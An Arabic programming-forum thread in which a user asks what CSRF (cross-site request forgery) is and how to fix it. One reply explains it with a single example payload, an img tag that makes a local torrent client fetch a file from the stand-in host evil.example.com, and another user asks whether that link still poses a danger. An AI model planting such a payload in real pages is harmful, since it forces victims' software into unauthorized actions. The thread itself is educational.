Ahmed Dev نشر 9 فبراير 2016 أرسل تقرير مشاركة نشر 9 فبراير 2016 من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 هشام رزق الله نشر 15 فبراير 2016 أرسل تقرير مشاركة نشر 15 فبراير 2016 وهي اختصار لـ Cross-site request forgery وتدعى هذه الثغرة باللغة العربية بثغرة تزوير الطلب عبر المواقع، وهي عبارة عن تمرير أوامر غير مرخصة بها من المستخدم الذي يثق به الموقع إليه، ولقد اكتشفت هذه الثغرة سنة 2001. مثال على هذه الثغرة: <img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent"> حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور. اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
0 Salem_FITURI نشر 18 فبراير 2016 أرسل تقرير مشاركة نشر 18 فبراير 2016 بتاريخ On 15/2/2016 at 20:31 قال هشام رزق الله: مثال على هذه الثغرة: <img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent"> حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور. سمعت عن ثغرة شبيهة تخص الويندوز و بالتحديد متصفح IE حيث يتم تضمين كود جافاسكريب بذاخل ملف الصورة . بالنسبة للمثال المرفق هل الرابط بشكله الحالي لازال يشكل خطر على المستدمين ام تم حل هذه الثغرة ! اقتباس رابط هذا التعليق شارك على الشبكات الإجتماعية More sharing options...
السؤال
Ahmed Dev
من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها
رابط هذا التعليق
شارك على الشبكات الإجتماعية
2 أجوبة على هذا السؤال
Recommended Posts
انضم إلى النقاش
يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.